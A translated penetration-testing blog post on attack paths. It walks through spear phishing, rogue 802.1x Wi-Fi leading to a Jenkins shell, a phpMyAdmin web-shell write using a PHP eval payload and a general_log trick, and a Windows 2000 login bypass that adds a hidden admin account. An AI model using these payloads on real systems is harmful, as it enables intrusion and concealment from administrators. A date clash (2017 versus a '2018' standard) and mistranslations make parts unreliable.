Attack Path Analysis

11/11/2017

0x00 Definition of Attack Path

Attack path is not a new concept but one that has been defined as two statements in academia at present. The first is that the attack path is composed of all the asset nodes which an attacker passes through in the whole process of penetration test of information system. In another view, the attack path is all the means of attack used by an attacker in the process of of attacking a single asset. As a technician, I side with the latter one.

0x01 Combing of Attack Path

Why should we comb the attack paths?

As early as 2018, the first edition of PTES(Penetration Testing Execution Standard) showed that attack path analysis is indispensable in penetration test. Following are the main stages defined by the standard as the basis for penetration testing execution:

Pre-engagement Interactions
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting

The description of the stage of vulnerability analysis is as follows:

You need to consider how to obtain access to the target system. At the stage of vulnerability analysis, you should synthesize the information gained from previous stages and analyze which attack paths will be feasible.

It simply means that we could identify vulnerabilities in the target system through collecting information, and then comb the attack paths. The method is to select the appropriate scenario to plan the overall attack path, I just list a few applicable intranet and extranet attack paths in some attack scenarios as follows(For reference only):

0x02 Attack Path Analysis

In the process of penetration testing, we must be prepared to follow the "winding path" because things probably won't go smoothly as expected. To ensure a thorough understanding of the target system, the first thing you need to do is identify the target and scope of this attack through previous intelligence gathering. And then, draw attack paths based on the analysis of vulnerabilities of target system. It's better to attack the target system when you almost sure the particular attack will be succeed. I'll analyze a few specific cases according to some attack scenarios, and the methods of intelligence gathering and threat modeling that need not be detailed here.

Social Engineering—Spear Phishing

Spear phishing is one of the common attack methods used by hackers, it often send targeted emails that trick recipients into clicking on unsafe links or attachments.

Case Description

Jerry is a hacker employed by Company A as a social-engineering attack censor whose task is to try to break into the servers of Company A. The company has some patented processes and a list of suppliers that the rivals want to obtain. However, the chief executive told Jerry that it was almost impossible to break into the servers of his company because he takes his own life to preserve secret materials.

Jerry found the server location, IP address, e-mail address, telephone number, physical address, e-mail server, employee names and more information of Company A through previous intelligence gathering. He also managed to know that the CEO has a family member with cancer so that Jerry began to focus on the research and fund-raising of cancer, and actively involved in it. Meanwhile, it seems quite simple for Jerry to get other personal information about the CEO, such as his favorite restaurant and football team.

After mastering these materials, Jerry called the CEO and pretended to be a fundraiser of a cancer charity where the CEO had been to before. Moreover, he told the CEO that the cancer charity will conduct a lottery draw. In addition to the coupons for several restaurants (including his favorite restaurant), the prizes for donors also includes two tickets for a football match(including his favorite team).

As expected, the CEO agreed to ask Jerry to send him a PDF document with more information about the activity. Jerry even managed to persuade the CEO to use a specific version of Adobe reader on his computer, because he told the CEO, "I want to make sure you can open the PDF file. " Soon after he sent the PDF file, the CEO opened the file and his computer was installed with a malicious Trojan Horse which allowed Jerry to break into his computer.

Case Analysis

This case is applicable for spear phishing scenarios because the target is a specific individual or group, and the target host is in a closed network. Since the attack is for a specific individual or group, typically the attacker will spend time to get information of the employee names and titles, e-mail address, telephone number, server IP address, physical address, mail server and other information in early stage. In order to trick the recipient into clicking on the links with malicious Trojan Horse, the attacker need to obtain the trust of a target individual by impersonating someone. When the recipient clicks on the malicious link on his computer, he will run a Trojan Horse program which allows hackers to break into his host.

Network Layer—Intrusion of Wireless Network

For wireless networking attacks, the most frequently used way is to build fishing WiFi. Once the attacked target automatically connects to Wi-Fi, the attacker will intercept the communication data and steal sensitive data. The enterprise network may be intruded by attacker in the event of providing public Wi-Fi for employees' daily use, and then the attacker could steal the confidential data.

Case Description

The security tester found that there were two wireless networks near the target company. One of the networks was public Wi-Fi and based on Portal Authentication, another is the 802.1x network. After connecting to the public Wi-Fi, the tester jumped to the Portal Authentication page.

Soon an common vulnerability was detected by is that usern ames of this portal system can be viewed due to the information returned from login page. The tester used burp force method to obtained the user names through Burp Suite scanner, and he logged into the portal system after burp force attack on the password of user names. However, it had been found that this network is isolated from office network of the company. Considering that purpose of the penetration test is to break into intranet, hence the network can not be the target. The tester turned eyes to another wireless network in the use of 802.1x authentication.

When companies deploy 802.1x wireless network, PEAP-MSCHAP V2 architecture are generally adopted with consider of compatibility and convenience of domain account. The authentication process of PEAP is divided into two stages as follows:

First, the client authenticates the server and establishes TLS tunnel between server and client. Then server sends certificate information to client, in order to achieve " Client-to-Server Authentication ".
Second, after the first stage of TLS tunnel established, multiple authentication methods (usually EAP-TLS or EAP-MSCHAPv2) are shared with PEAP to achieve "Server-to-Client Authentication".

At present, the problem of PEAP mainly lies with clients to certificate validation of server. The validation provides the security of transport layer for authentication through similar SSL mechanism, and also requires companies to purchase certificates from CA, or establish their own PKI system and sign certificates for wireless network. Meanwhile, they need to deploy root certificates to each client. Most companies choose to sign a certificate by themselves because deploying root certificates to each client is so complicated that they prefer to abandon this choice directly.

The method of this attack is to trick users into connecting a pseudo Wi-Fi established by the tester, then getting the hash of the account transmitted during the process of MSCHAP V2 authentication in the second stage, and he can burp force the password in the use of dictionary. Here the tester used hostapd-wpe to build a 802.1x Wi-Fi, and eight hash values were obtained in a few moment. He successfully gained two login passwords by using brute-force programs, which run through passwords guesses at rapid speed until it gets a match.

Through the previous detection, he found that the company adopted PEAP-MSCHAP V2 architecture because the two login accounts were also the the domain accounts, which are able to log into office automation system. Moreover, a Jenkins program was found in the intranet through detection. Jenkins is a continuous integrated tool based on Java for monitoring lastingly reproducible work. When the configuration of Jenkins is not appropriate, there will be a vulnerability of unauthorized command execution, but the administrator had been limited it. Therefore, the tester need to get an account that can execute commands.

Accessing the management page of the Jenkins program, the list of users is obtained in the state of non-login due to insecurity configurations. After grabbing all user names, three passwords are successfully obtained by burp force attack. The tester logged into to Jenkins program and accessed the page like "xxxx.com/script" with one of the three accounts. Although the account could execute commands and had very low privileges, the shell can be rebounded back to the local server for permission elevation. Due to the "wget" command in the environment cannot be used, the rebound script is written on the server by using Groovy grammar. Next, the test gained the root authority from exploiting local privilege promotion vulnerability of Linux Kernel. The next step is to collect information about sensitive files such as configuration files, history, shadow, etc. After decrypting the passwords obtained in shadow, he tried to use "Hydra"—the burp force tool— to log into the intranet host through SSH protocol. Then a private key file was found by logging into a server successfully, and through it, he accessed to another server and detected a Zabbix program. When the server address of the Zabbix program was found in the configuration file, the task turned into finding account passwords for Zabbix program. By collecting information from the history file found in several other severs before, the tester used burp force method to obtain the password of Zabbix's account and finally entered Zabbix. Finally, the tester successfully intruded intranet of the company.

Case Analysis

This case is a typical wireless intrusion scenario in the network layer attack scenario. Firstly, the attacker discovered that the company has opened up the public wireless network. Then the pseudo Wi-Fi is used to obtain employees' login accounts, which are used to intrude the Wi-Fi of the company. Finally relying on the pseudo WiFi to break into the intranet system.

Application Layer—Application Weak Password

PhpMyadmin is a popular database management system. If the password setting is too simple, an attacker could log into the system and further intrude the host.

Case Description

During the penetration testing, We may meet some Web environments built with phpStudy at some time. If PhpMyAdmin has a weak password, we could get the root privilege of MySQL database and write Web Shell to the database by executing database statements. Here's an experiment I've done.

phpStudy is a application integration package in PHP debugging environment. It integrates MySQL, Apache and other environments, also including MySQL management tool named PhpMyAdmin. Here's a little trick. In the root directory of a php Website, there is always an L. PHP probe, and when you encounter a probe that contains all kinds of server and website information. The PHP probe looks like this:

In phpStudy environment, the default password for PhpMyAdmin is "root/root". We use this weak password to log into PhpMyAdmin.

Seeing this, you may think of writing the shell with outfile command.

select '<?php @eval($_POST["hihack"]);?>' into outfile 'C:\phpStudy\PHPTutorial\WWW\hacker.php'

But what if this happens?

This error means that the MySQL server is running with a low-privileged option . The MySQL official gives the explanation that this option (- secure-file-priv = name Limit LOAD DATA, SELECT... OUTFILE, and LOAD_FILE() to files within specified directory) restricts to export and import files into the specified directory, so this statement cannot be executed.

Is it impossible to deal with this problem?

It really isn't. There is another command that can help us write Web Shell to MySQL database, that is "general_log". After MySQL opens this option, all the queries can be read in "general_log" file. However, this log file will be closed by default due to the file will be very large generally. Sometimes it is necessary to open the option of "general_log" in order to debug. In other words, "general_log" file records all queries and displays them in the original state. If the option of "general_log" is opened and the "general_log" file is set to a PHP file, the operation for queries will be written to the particular file, and then the queries will be executed in MySQL.

set global general_log=’on’;

set global general_log_file=’ C:\phpStudy\PHPTutorial\WWW\hacker.php’;

select ‘<?php @eval($_POST["hihack"]);?>’;

As long as we open the general_log option, we can set up the physical path to execute MySQL statements arbitrarily. These statements will be recorded in "general_log" file, so we can write a Web shell into this file.

Finally, you can get the Web Shell by connecting the specified file "hacker. php" in the use of the Web Shell management tool.

Case Analysis

Many companies and individuals like to use PhpMyAdmin to manage MySQL databases, It is amazing to search for the keyword "PhpMyAdmin" in zoomeye, ranking second in China. PhpMyAdmin is very powerful and convenience due to the friendly visual interface, ability to command execution and import and export of databases. It can be said that PhpMyAdmin can entirely manipulate the MySQL database. However, if the Root password is too simple and the MySQL configuration is leaked, 99% of attackers could get Web Shell or even server privileges by technical means. PhpMyAdmin is widely used in some popular architectures, such as phpStudy, phpnow, Wammp, Lamp and Xamp, etc. The default password for these architectures is root, hence it will be vulnerable to intrude if the password is not changed.

System Layer—Remote Node Intrusion

Most applications that provide remote access do not have internal security policies, nor do they provide independent security authentication mechanisms. Therefore, there is no doubt that remote access to the internal network resources increases the vulnerabilities of companies' intranet, a common way to exploit is remote node intrusion. The access mode of remote nodes refers that a computer connects to a remote access server, which can be accessed by RDP, Telnet and SSH. Here is a case of intruding into port 3389 of Windows 2000 system(This case is quoted from the Internet.)

Case Description

Port 3389 is the port of Windows 2000 Server Remote Desktop Protocol. The approach to be mentioned in this case is to exploit a classic vulnerability of input method that exists in all Chinese versions of Microsoft Windows 2000. This vulnerability is not new, but it's classic.

The first step is to use the port scanning tool to detect the operating system version and the ports opened in hosts of the current network segment(intranet). The second step, assuming that we detected a host with 3389 vulnerabilities, what we need to do now is to enter the host and connect to port 3389 remotely so that we can see the familiar Windows 2000 login interface. The third step is to exploit the vulnerability of input method to create a user and add it to the group of administrators. Or activate the guest user, I suggest you to activate the guest user because it is not easy to be found by the administrator, the specific steps is as follows:

1) Using the CTRL + shift key to quickly switch the input method to the full spelling, then the input method status bar will appear in the lower left corner of the login interface (if it does not appear, wait for a while). Right-click the Microsoft icon on the status bar and pop up the "Help" menu (if "Help" is gray at this time, you could give up because it is likely that the vulnerability has been fixed).

2) Open the "Operations Guide" in "Help" mebu and right-click on the top taskbar, you can see a pop-up window named "jump to URL" . At this point, there will be the current URL address and a blank bar for the Windows 2000 system installation path. For example, the system is installed on the d disk, and the blank column is filled with "d:\winnt system 32". We filled in "d:\winnt system 32" as shown in the picture below and clicked "OK".

The link will appear in the right window as the picture shown. Clicking the link "file display", then we successfully bypass the authentication and enter the directory “system32” of the system.

3) Now we need to get an account to become a legitimate user of the system. The first thing is to find "net.exe" in the directory “system32” and create a shortcut for "net.exe", then you should right-click the shortcut, as well as fill in "user guest active :yes" after "attribute-> target-> d: winnt system32 net.exe" followed by a space, you still need to click "ok" in final. The purpose of this step is to activate the banned guest account in user of "net.exe", and also the form "user username password /add" is recognized. Here you can create a user named WINADMIN, find the NET file and right-click "create shortcuts—>attributes —>add the user".

4) In the figure above, we have added a user named "WINADMIN", and then changing the password of WINADMIN with the command "net user winadmin xxxx", "xxxx" is the password you want to set! There may be no response after executing the command, but the user has actually been added. Absolutely it's not enough to have permissions of ordinary user. We need to add the user to the administrators group for privilege promotion.

Now we have access to the target host.

5) Entry into the Registry, modify or create a value of D Word named "dontdisplaylastusername" under the "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft WindowsNT\Current Version\Winlogon" key and input "1" in the numerical data. This key value means that the next time you get on the computer, there will no longer be any last login user on the user list so that the administrator won't find you. Yeah!

Case Analysis

Many people will say it is just the vulnerability of input method that almost everyone knows. However, Hosts that open port 3389 do not necessarily have input method vulnerabilities first, Remote Desktop Protocol is just a normal service of Windows. But the system that has not patched and the port 3389 is opened can use the vulnerability input method to create users or activate guest users. This vulnerability makes terminal service of Win 2000 a legal Trojan Horse. Now this vulnerability has been rarely seen.

Conclusion

Get back to the question - why should we comb the attack path?

This article just simply analyses several attack paths, hoping that besides discussing the attack ideas from the perspective of the red side(attackers), it can also provide some defensive ideas for the blue side(network security personnel). Nowadays, many enterprises misunderstand the security construction of information systems, they often stay at the stage of external penetration testing, ignoring the internal security of information systems. The combing and analysis of attack path not only embodies the value in the red-blue confrontation, but also provides a excellent modeling in order to support for the internal and external security construction of whole enterprise information system. I have not completed the construction of information system, but it can be imagined that performance is the main purpose, so security is not the second or even the third important factor in the process of information system construction. But if we shouldn't consider the security factor at the beginning, the future maintenance and security investment of information system would be bound to be enormous.

Therefore, the combing and analysis of attack paths can be normalized. Meanwhile, the summary of penetration testing and emergency response can be continuously enriched. These can help us find fix the vulnerabilities of information system in time.

Google Sites

Report abuse